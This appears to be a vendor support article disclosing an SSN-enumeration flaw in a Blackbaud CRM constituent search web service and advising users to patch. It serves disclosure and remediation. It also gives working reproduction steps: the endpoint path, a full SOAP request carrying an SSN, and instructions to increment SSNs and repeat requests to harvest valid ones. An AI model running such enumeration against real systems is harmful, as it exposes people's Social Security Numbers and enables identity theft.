Using Webservices Constituent Search Vulnerability

In creating a web service application, an authenticated authorized BBEC user with the "General Access" role can query the "Constituent Search (UM Extension)" service to match valid Social Security Numbers to constituent causing a search vulnerability.
Download and install the latest patch, which contains all fixes from previous patches. If you are running an older version, download and install the latest version and then the patch. 


Here are the steps:

1. Log in as a user with the "General Access" role (I don’t know if this is a role we created, or one that came configured with the CRM).

2. POST a request to the "Constituent Search (UM Extension)" endpoint (/bbappfx/vpp/bizops/db%5BBTP_PROD%5D/searchlists/76d8c79c-b8d4-4349-beb5-283b4bad4285/soap.asmx) with the following contents:

<soapenv:Envelope xmlns:soapenv="<http://schemas.xmlsoap.org/soap/envelope/>" xmlns:blac="blackbaud_appfx_server_bizops">

<soapenv:Header/>

<soapenv:Body>

<blac:SearchRequest>

<!--Optional:-->

<blac:SessionKey>[session key as needed]</blac:SessionKey>

<!--Optional:-->

<blac:Criteria>

<!--Optional:-->

<blac:SSN>[SSN to test]</blac:SSN>

</blac:Criteria>

</blac:SearchRequest>

</soapenv:Body>

</soapenv:Envelope>

3. If the SSN is valid and the corresponding person exists in the database, a record will be returned that contains identifying information.

4. For the next request, the SSN can be incremented by one, or chosen in some other manner, and the POST would be repeated with the new SSN.

To fully exploit this, an authenticated and authorized attacker would send repeated requests and record any hits on real records. I was able to get a hit rate of about 2% in my tests, which allowed harvesting of more than 1,200 valid SSNs in around ten minutes.

Environment

 2.91.1535, patch 36

Was this article helpful?


Thanks for your feedback! Did this solve your issue?

Comments (optional):


Thanks for your feedback!
We're glad it was helpful but sorry it didn’t solve your issue. If you need assistance, click Chat with Support below.
We’re sorry to hear that. Please tell us why.

 I don't like how this works.

 The answer is confusing.

 The answer didn't match what I was searching for.

Additional Comments (optional):


Thanks for your feedback! If you need assistance, click Chat with Support below.
Thanks for your feedback. Help us make our products even better by sharing details in our Idea Banks or our online Community.
Thanks for letting us know. We'll work on clarifying the information in the article. If you need assistance, click Chat with Support below.
Thanks for letting us know. We'll work on updating the search engine to return more relevant results.